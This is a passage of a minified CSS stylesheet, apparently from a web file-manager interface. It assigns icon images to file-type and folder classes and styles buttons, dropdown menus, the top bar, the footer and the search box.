\9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xaml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xaml.png?ver=3.30',sizingMethod='scale');}.x-xap{background-image:url("../../../images/file_icon/icon_file/xap.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xap.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xap.png?ver=3.30',sizingMethod='scale');}.x-xls{background-image:url("../../../images/file_icon/icon_file/xls.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xls.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xls.png?ver=3.30',sizingMethod='scale');}.x-xlsb{background-image:url("../../../images/file_icon/icon_file/xlsb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsb.png?ver=3.30',sizingMethod='scale');}.x-xlsm{background-image:url("../../../images/file_icon/icon_file/xlsm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsm.png?ver=3.30',sizingMethod='scale');}.x-xlsx{background-image:url("../../../images/file_icon/icon_file/xlsx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsx.png?ver=3.30',sizingMethod='scale');}.x-xlt{background-image:url("../../../images/file_icon/icon_file/xlt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlt.png?ver=3.30',sizingMethod='scale');}.x-xltx{background-image:url("../../../images/file_icon/icon_file/xltx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xltx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xltx.png?ver=3.30',sizingMethod='scale');}.x-xml{background-image:url("../../../images/file_icon/icon_file/xml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');}.x-xps{background-image:url("../../../images/file_icon/icon_file/xps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xps.png?ver=3.30',sizingMethod='scale');}.x-xsd{background-image:url("../../../images/file_icon/icon_file/xsd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsd.png?ver=3.30',sizingMethod='scale');}.x-xsl{background-image:url("../../../images/file_icon/icon_file/xsl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsl.png?ver=3.30',sizingMethod='scale');}.x-y{background-image:url("../../../images/file_icon/icon_file/y.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/y.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/y.png?ver=3.30',sizingMethod='scale');}.x-zip{background-image:url("../../../images/file_icon/icon_file/zip.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip.png?ver=3.30',sizingMethod='scale');}.x-3dm,.x-3ds,.x-asm,.x-cam360,.x-catpart,.x-catproduct,.x-cgr,.x-collaboration,.x-dae,.x-dgn,.x-dlv3,.x-dwf,.x-dwfx,.x-dwg,.x-dwt,.x-dxf,.x-exp,.x-f3d,.x-fbx,.x-g,.x-gbxml,.x-iam,.x-idw,.x-ifc,.x-ige,.x-iges,.x-igs,.x-ipt,.x-jt,.x-model,.x-neu,.x-nwc,.x-nwd,.x-obj,.x-prt,.x-rvt,.x-sab,.x-sat,.x-session,.x-skp,.x-sldasm,.x-sldprt,.x-smb,.x-smt,.x-ste,.x-step,.x-stl,.x-stla,.x-stlb,.x-stp,.x-wire,.x-x_b,.x-x_t,.x-xas,.x-xpr{background-image:url("../../../images/file_icon/icon_file/autodesk/autodesk.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/autodesk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/autodesk.png?ver=3.30',sizingMethod='scale');}.x-3ds{background-image:url("../../../images/file_icon/icon_file/autodesk/3ds.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3ds.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3ds.png?ver=3.30',sizingMethod='scale');}.x-3dm{background-image:url("../../../images/file_icon/icon_file/autodesk/3dm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3dm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3dm.png?ver=3.30',sizingMethod='scale');}.x-dae{background-image:url("../../../images/file_icon/icon_file/autodesk/dae.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dae.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dae.png?ver=3.30',sizingMethod='scale');}.x-stl,.x-stla,.x-stlb{background-image:url("../../../images/file_icon/icon_file/autodesk/stl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/stl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/stl.png?ver=3.30',sizingMethod='scale');}.x-dwg{background-image:url("../../../images/file_icon/icon_file/autodesk/dwg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwg.png?ver=3.30',sizingMethod='scale');}.x-dwf{background-image:url("../../../images/file_icon/icon_file/autodesk/dwf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');}.x-dwfx{background-image:url("../../../images/file_icon/icon_file/autodesk/dwf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');}.x-dxf{background-image:url("../../../images/file_icon/icon_file/autodesk/dxf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dxf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dxf.png?ver=3.30',sizingMethod='scale');}.x-ifc{background-image:url("../../../images/file_icon/icon_file/autodesk/ifc.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/ifc.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/ifc.png?ver=3.30',sizingMethod='scale');}.x-iam{background-image:url("../../../images/file_icon/icon_file/autodesk/iam.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/iam.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/iam.png?ver=3.30',sizingMethod='scale');}.x-fbx{background-image:url("../../../images/file_icon/icon_file/autodesk/fbx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/fbx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/fbx.png?ver=3.30',sizingMethod='scale');}.x-rvt{background-image:url("../../../images/file_icon/icon_file/autodesk/rvt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/rvt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/rvt.png?ver=3.30',sizingMethod='scale');}.x-skp{background-image:url("../../../images/file_icon/icon_file/autodesk/skp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/skp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/skp.png?ver=3.30',sizingMethod='scale');}.x-vnd,.x-dgn{background-image:url("../../../images/file_icon/icon_file/autodesk/vnd-dgn.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/vnd-dgn.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/vnd-dgn.png?ver=3.30',sizingMethod='scale');}.x-folder{background-image:url("../../../images/file_icon/icon_others/folder.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder.png?ver=3.30',sizingMethod='scale');}.x-folder-share{background-image:url("../../../images/file_icon/icon_others/folder_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');}.x-recycle{background-image:url("../../../images/file_icon/icon_others/recycle.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle.png?ver=3.30',sizingMethod='scale');}.x-recycle-full{background-image:url("../../../images/file_icon/icon_others/recycle_full.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle_full.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle_full.png?ver=3.30',sizingMethod='scale');}.x-path-self-share{background-image:url("../../../images/file_icon/icon_others/path_self_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/path_self_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/path_self_public.png?ver=3.30',sizingMethod='scale');}.x-app-link{background-image:url("../../../images/file_icon/icon_others/app_link.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/app_link.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/app_link.png?ver=3.30',sizingMethod='scale');}.x-user{background-image:url("../../../images/file_icon/icon_others/user.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/user.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/user.png?ver=3.30',sizingMethod='scale');}.x-user-self{background-image:url("../../../images/file_icon/icon_others/userSelf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/userSelf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/userSelf.png?ver=3.30',sizingMethod='scale');}.x-share{background-image:url("../../../images/file_icon/icon_others/share.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/share.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/share.png?ver=3.30',sizingMethod='scale');}.x-group-self{background-image:url("../../../images/file_icon/icon_others/groupSelf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelf.png?ver=3.30',sizingMethod='scale');}.x-group-self-owner{background-image:url("../../../images/file_icon/icon_others/groupSelfOwner.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfOwner.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfOwner.png?ver=3.30',sizingMethod='scale');}.x-group-guest{background-image:url("../../../images/file_icon/icon_others/groupGuest.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupGuest.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupGuest.png?ver=3.30',sizingMethod='scale');}.x-group-self-root{background-image:url("../../../images/file_icon/icon_others/groupSelfRoot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfRoot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupSelfRoot.png?ver=3.30',sizingMethod='scale');}.x-group-root{background-image:url("../../../images/file_icon/icon_others/groupRoot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupRoot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/groupRoot.png?ver=3.30',sizingMethod='scale');}.x-group-public{background-image:url("../../../images/file_icon/icon_others/folder_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');}.x-tree-self{background-image:url("../../../images/file_icon/icon_others/computer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');}.x-computer{background-image:url("../../../images/file_icon/icon_others/computer.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/computer.png?ver=3.30',sizingMethod='scale');}.x-tree-fav{background-image:url("../../../images/file_icon/icon_others/treeFav.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/treeFav.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/treeFav.png?ver=3.30',sizingMethod='scale');}.x-edit{background-image:url("../../../images/file_icon/icon_others/edit.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/edit.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/edit.png?ver=3.30',sizingMethod='scale');}.x-search{background-image:url("../../../images/file_icon/icon_others/search.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/search.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/search.png?ver=3.30',sizingMethod='scale');}.x-upload{background-image:url("../../../images/file_icon/icon_others/upload.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/upload.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/upload.png?ver=3.30',sizingMethod='scale');}.x-setting{background-image:url("../../../images/file_icon/icon_others/setting.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/setting.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/setting.png?ver=3.30',sizingMethod='scale');}.x-logout{background-image:url("../../../images/file_icon/icon_others/logout.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/logout.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/logout.png?ver=3.30',sizingMethod='scale');}.x-app-store{background-image:url("../../../images/file_icon/icon_others/appStore.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/appStore.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/appStore.png?ver=3.30',sizingMethod='scale');}.x-error{background-image:url("../../../images/file_icon/icon_others/error.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/error.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/error.png?ver=3.30',sizingMethod='scale');}.x-info{background-image:url("../../../images/file_icon/icon_others/info.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/info.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/info.png?ver=3.30',sizingMethod='scale');}.frame-fullscreen{position:fixed;z-index:999499;left:0;top:0;}.font-icon{font-family:FontAwesome;font-style:normal;color:inherit;}.dragMaskView{position:absolute;top:0;left:0;right:0;bottom:0;z-index:888;background:#fff;opacity:0.01;filter:alpha(opacity=1);-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.content-box .ace_cjk{width:1em !important;}.content-box .ace_static_highlight{font-size:1.15em;}.aui-buttons button{font-size:1em;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.dialog-change-max,.dialog-change-max .aui-main{-webkit-transition:all 0.25s;-moz-transition:all 0.25s;-o-transition:all 0.25s;-ms-transition:all 0.25s;transition:all 0.25s;}.aui-title span{position:absolute;width:80%;overflow:hidden;height:30px;word-break:break-all;text-overflow:ellipsis;white-space:nowrap;}.less-error-message{display:none;}[class^="icon-"],[class*=" icon-"]{background-image:auto;}.btn-group-sm>.btn{padding:4px 10px;line-height:1em;}.btn{padding:6px 14px;border-radius:3px;box-sizing:content-box;}.btn:focus{outline:none;}.btn.btn-default .font-icon{color:#999;}.btn.btn-default:active,.btn.btn-default.active{border-color:#ADADAD;color:#888;}.btn.btn-left{border-top-right-radius:0;border-bottom-right-radius:0;}.btn.btn-middle{border-radius:0;}.btn.btn-right{border-top-left-radius:0;border-bottom-left-radius:0;}.btn.btn-lg{padding:10px 16px;font-size:18px;line-height:1.33;}.btn.btn-nomal{padding:4px 12px;}.btn.btn-sm{padding:2px 10px;}.btn.btn-xs{padding:1px 5px;font-size:12px;line-height:1.5;}.btn.btn-active{background:#63acff !important;border-color:#4fa1ff !important;border-bottom-color:#449cff !important;z-index:100;text-shadow:none;color:#fff !important;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#8cc2ff', endColorstr='#63acff');background-image:-webkit-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-moz-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-o-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:-ms-linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);background-image:linear-gradient(to bottom,#8cc2ff 0,#63acff 100%);-pie-background:linear-gradient(to to bottom,#8cc2ff 0,#63acff 100%);}.btn.btn-active:hover,.btn.btn-active:active{background:#3a96ff !important;border-color:#268bff !important;border-bottom-color:#1c86ff !important;z-index:100;text-shadow:none;color:#fff !important;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#63acff', endColorstr='#3a96ff');background-image:-webkit-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-moz-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-o-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:-ms-linear-gradient(to bottom,#63acff 0,#3a96ff 100%);background-image:linear-gradient(to bottom,#63acff 0,#3a96ff 100%);-pie-background:linear-gradient(to to bottom,#63acff 0,#3a96ff 100%);}.btn-group.disabled{opacity:0.6;filter:alpha(opacity=60);}.dropdown-menu{left:auto;right:0px;border-radius:4px;border:1px solid rgba(0,0,0,0.05);box-shadow:0 4px 30px rgba(0,0,0,0.15);max-height:400px;margin-top:0;}.dropdown-menu>li>a:hover,.dropdown-menu .this a,.dropdown-menu>li>a:focus{-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;background-image:none;filter:none;background:#63acff;color:#fff;}.dropdown-menu>li>a{font-weight:inherit;color:#666;}.dropdown-menu>li>a .font-icon{opacity:0.8;}.dropdown-menu:after{content:'';display:inline-block;border-left:6px solid rgba(0,0,0,0);border-right:6px solid rgba(0,0,0,0);border-bottom:6px solid #FFF;position:absolute;top:-6px;right:10px;}.dropdown-menu:before{content:'';left:auto;right:12px;display:inline-block;position:absolute;border-left:7px solid rgba(0,0,0,0);border-right:7px solid rgba(0,0,0,0);top:-7px;border-bottom:7px solid #CCC;border-bottom-color:rgba(0,0,0,0.2);right:9px;}.dropdown-menu.menu-top:after{content:'';display:inline-block;border-left:6px solid rgba(0,0,0,0);top:inherit;border-right:6px solid rgba(0,0,0,0);border-top:6px solid #FFF;border-bottom:none;position:absolute;bottom:-6px;right:10px;}.dropdown-menu.menu-top:before{content:'';left:auto;right:12px;display:inline-block;position:absolute;border-bottom:none;border-left:7px solid rgba(0,0,0,0);border-right:7px solid rgba(0,0,0,0);bottom:-7px;border-top:7px solid #CCC;border-top-color:rgba(0,0,0,0.2);right:9px;top:inherit;}.dropdown-menu .divider{margin:0.3em 0;}input{border:1px solid #ddd;background:#fff;outline:none;}input[type="radio"],input[type="checkbox"]{border:none;background:none;}.topbar{width:100%;height:40px;color:#ddd;top:0;background:#63acff;position:absolute;z-index:auto;}.topbar .content{padding:0px;line-height:40px;height:39px;word-break:break-all;}.topbar .content i.font-icon{display:inline-block;padding-right:10px;font-size:1.1em;}.topbar .content .topbar-menu{display:block;text-decoration:none;color:#fff;border:1px solid #4a9eff;overflow:hidden;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;padding:0px 1.2em;border-top:none;border-bottom:none;outline:none;float:left;margin-left:-1px;font-size:14px;}.topbar .content .topbar-menu.title{font-size:20px;width:200px;width:202px\0;padding:0;text-align:center;}.topbar .content .topbar-menu.title:hover{background:none;}.topbar .content .topbar-menu .icon{width:25px;height:25px;margin-right:5px;padding:0;margin-top:-4px;font-size:13px;line-height:25px;text-align:center;background:none;}.topbar .content .title img{max-width:200px;max-height:44px;}.topbar .content .open .topbar-menu,.topbar .content .topbar-menu:hover,.topbar .content .topbar-menu.this{background:#4a9eff;}.topbar .content .menu-desktop:before{content:"\f108";}.topbar .content .menu-explorer:before{content:"\f0ae";}.topbar .content .menu-editor:before{content:"\f044";}.topbar .content .top-left{overflow:hidden;height:40px;width:70%;}.topbar .content .top-right{position:absolute;right:0px;top:0px;margin-right:0px;height:40px;}.topbar .content .top-right .menu-group{height:40px;margin-right:-1px;float:left;position:relative;}.topbar .content .top-right .topbar-menu{display:inline-block;padding:0px 6px;margin-right:1px;}.topbar .content .top-right .topbar-menu i{padding-right:3px;}.topbar .content .top-right .btn{color:#fff;}.topbar .content .top-right ul a{line-height:30px;height:30px;display:block;padding:0px 1.7em;border:none;overflow:hidden;}.topbar .content .top-right ul a:hover,.topbar .content .top-right ul a.this{margin-right:0px;}.topbar .content .top-right ul a.this{background:#63acff;color:#fff;}.topbar .content .top-right ul .font-icon{width:18px;display:inline-block;}.topbar .content .top-right ul.dropdown-menu{margin-top:-1px;}.topbar .content .top-right ul.dropdown-menu.topbar-language{width:470px;padding:10px 5px;}.topbar .content .top-right ul.dropdown-menu.topbar-language li{width:115px;float:left;margin:0 1px 1px 0;}.topbar .content .top-right ul.dropdown-menu.topbar-language a{padding:0 8px 0 8px;height:26px;line-height:26px;font-size:13px;}.topbar .content .top-right ul.dropdown-menu.topbar-language i.flag{padding-right:0px;background-color:#eee;position:relative;top:1px;}.topbar .content .share-title{text-align:center;color:#fff;float:left;margin-left:8px;margin-right:7px;}.topbar .content .share-title-info{color:#fff;font-size:1.25em;background:#eee;background:rgba(0,0,0,0.2);border-radius:4px;padding:6px;}.topbar .content .share-info{color:#fff;float:left;font-size:1em;}.topbar .content .share-info .time{padding-left:5px;color:#fff;padding-right:8px;}.topbar .content .top-right div.share-info-user{margin-right:10px;color:#fff;position:relative;}.topbar .content .top-right div.share-info-user .btn-download,.topbar .content .top-right div.share-info-user .btn.button-my-share{padding:4px 20px;margin-left:5px;}.topbar .content .top-right div.share-info-user .dropdown-toggle{height:16px;}.common-footer{position:fixed;bottom:0px;background:#f8f8f8;color:#999;font-size:1em;width:100%;text-align:center;border-top:1px solid #e8e8e8;height:31px;line-height:32px;overflow:hidden;}.common-footer .copyright-bottom{cursor:pointer;font-size:1.25em;color:#aaa;text-decoration:none;}.common-footer .copyright-bottom:hover{color:#f60;border-bottom:none;}.desktop-widget{z-index:10 !important;}.do-search-box{color:#888;}.do-search-box .search-header{padding:10px;padding-bottom:0px;}.do-search-box .search-header input[type='checkbox']{padding-left:0px;}.do-search-box .search-header label{font-size:1em;}.do-search-box .search-header .btn-right{margin:0px 0 0 -2px;height:25px;width:30px;padding:0;height:28px \9\0;position:absolute !important;}.do-search-box .search-header 